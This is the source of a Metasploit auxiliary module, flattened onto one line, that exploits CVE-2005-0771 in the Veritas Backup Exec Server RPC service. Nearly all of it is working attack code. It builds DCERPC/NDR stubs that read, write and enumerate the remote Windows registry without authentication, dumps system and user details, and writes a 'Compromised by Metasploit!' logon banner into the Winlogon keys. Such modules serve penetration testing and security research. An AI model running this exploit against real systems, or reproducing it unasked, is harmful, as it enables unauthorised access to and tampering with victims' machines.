## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Post::Windows::Registry def initialize(info = {}) super(update_info(info, 'Name' => 'Veritas Backup Exec Server Registry Access', 'Description' => %q{ This modules exploits a remote registry access flaw in the BackupExec Windows Server RPC service. This vulnerability was discovered by Pedram Amini and is based on the NDR stub information posted to openrce.org. Please see the action list for the different attack modes. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'References' => [ [ 'OSVDB', '17627' ], [ 'CVE', '2005-0771' ], [ 'URL', 'https://web.archive.org/web/20110801042138/http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=269'], ], 'Actions' => [ ['System Information', 'Description' => 'Dump system info (user, owner, OS, CPU...)'], ['Create Logon Notice', 'Description' => 'Add a logon notice'] ], 'DefaultAction' => 'System Information' )) register_options( [ Opt::RPORT(6106), OptString.new('WARN', [ false, "The warning to display for the Logon Notice action", "Compromised by Metasploit!\r\n" ] ), ]) end def auxiliary_commands return { "regread" => "Read a registry value", # "regenum" => "Enumerate registry keys", } end def run case action.name when 'System Information' system_info() when 'Create Logon Notice' logon_notice() end end def cmd_regread(*args) if (args.length == 0) print_status("Usage: regread HKLM\\\\Hardware\\\\Description\\\\System\\\\SystemBIOSVersion") return end paths = args[0].split("\\") hive = paths.shift subval = paths.pop subkey = paths.join("\\") data = backupexec_regread(hive, subkey, subval) if (data) print_status("DATA: #{deunicode(data)}") else print_error("Failed to read #{hive}\\#{subkey}\\#{subval}...") end end def cmd_regenum(*args) if (args.length == 0) print_status("Usage: regenum HKLM\\\\Software") return end paths = args[0].split("\\") hive = paths.shift subkey = "\\" + paths.join("\\") data = backupexec_regenum(hive, subkey) if (data) print_status("DATA: #{deunicode(data)}") else print_error("Failed to enumerate #{hive}\\#{subkey}...") end end def system_info print_status("Dumping system information...") prod_id = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows\\CurrentVersion', 'ProductId') || 'Unknown' prod_name = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'ProductName') || 'Windows (Unknown)' prod_sp = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'CSDVersion') || 'No Service Pack' owner = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'RegisteredOwner') || 'Unknown Owner' company = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'RegisteredOrganization') || 'Unknown Company' cpu = backupexec_regread('HKLM', 'Hardware\\Description\\System\\CentralProcessor\\0', 'ProcessorNameString') || 'Unknown CPU' username = backupexec_regread('HKCU', 'Software\\Microsoft\\Windows\\CurrentVersion\\Explorer', 'Logon User Name') || 'SYSTEM' print_status("The current interactive user is #{deunicode(username)}") print_status("The operating system is #{deunicode(prod_name)} #{deunicode(prod_sp)} (#{deunicode(prod_id)})") print_status("The system is registered to #{deunicode(owner)} of #{deunicode(company)}") print_status("The system runs on a #{deunicode(cpu)}") end def logon_notice print_status("Setting the logon warning to #{datastore['WARN'].strip}...") backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeText', REG_SZ, datastore['WARN']) backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeCaption', REG_SZ, 'METASPLOIT') end def deunicode(str) str.gsub(/\x00/, '').strip end # # Write a registry key # def backupexec_regwrite(hive, subkey, subval, type, data) stub = backupexec_regrpc_write( :hive => registry_hive_lookup(hive), :subkey => subkey, :subval => subval, :type => type, :data => data ) resp = backupexec_regrpc_call(5, stub) return false if resp.length == 0 return true end # # Read a registry key # def backupexec_regread(hive, subkey, subval, type = REG_SZ) stub = backupexec_regrpc_read( :hive => registry_hive_lookup(hive), :subkey => subkey, :subval => subval, :type => type ) resp = backupexec_regrpc_call(4, stub) return nil if resp.length == 0 ret, len = resp[0,8].unpack('VV') return nil if ret == 0 return nil if len == 0 return resp[8, len] end # # Enumerate a registry key # def backupexec_regenum(hive, subkey) stub = backupexec_regrpc_enum( :hive => registry_hive_lookup(hive), :subkey => subkey ) resp = backupexec_regrpc_call(7, stub) p resp return nil if resp.length == 0 ret, len = resp[0,8].unpack('VV') return nil if ret == 0 return nil if len == 0 return resp[8, len] end # # Call the backupexec registry service # def backupexec_regrpc_call(opnum, data = '') handle = dcerpc_handle( '93841fd0-16ce-11ce-850d-02608c44967b', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']] ) dcerpc_bind(handle) resp = dcerpc.call(opnum, data) outp = '' if (dcerpc.last_response and dcerpc.last_response.stub_data) outp = dcerpc.last_response.stub_data end disconnect outp end # RPC Service 4 def backupexec_regrpc_read(opts = {}) subkey = opts[:subkey] || '' subval = opts[:subval] || '' hive = opts[:hive] || HKEY_LOCAL_MACHINE type = opts[:type] || REG_SZ stub = NDR.UnicodeConformantVaryingString(subkey) + NDR.UnicodeConformantVaryingString(subval) + NDR.long(type) + NDR.long(1024) + NDR.long(0) + NDR.long(4) + NDR.long(4) + NDR.long(hive) return stub end # RPC Service 7 def backupexec_regrpc_enum(opts = {}) subkey = opts[:subkey] || '' hive = opts[:hive] || HKEY_LOCAL_MACHINE stub = NDR.UnicodeConformantVaryingString(subkey) + NDR.long(4096) + NDR.long(0) + NDR.long(4) + NDR.long(4) + NDR.long(hive) return stub end # RPC Service 5 def backupexec_regrpc_write(opts = {}) subkey = opts[:subkey] || '' subval = opts[:subval] || '' hive = opts[:hive] || HKEY_LOCAL_MACHINE type = opts[:type] || REG_SZ data = opts[:data] || '' if (type == REG_SZ || type == REG_EXPAND_SZ) data = Rex::Text.to_unicode(data+"\x00") end stub = NDR.UnicodeConformantVaryingString(subkey) + NDR.UnicodeConformantVaryingString(subval) + NDR.long(type) + NDR.long(data.length) + NDR.long(data.length) + data + NDR.align(data) + NDR.long(4) + NDR.long(4) + NDR.long(hive) return stub end end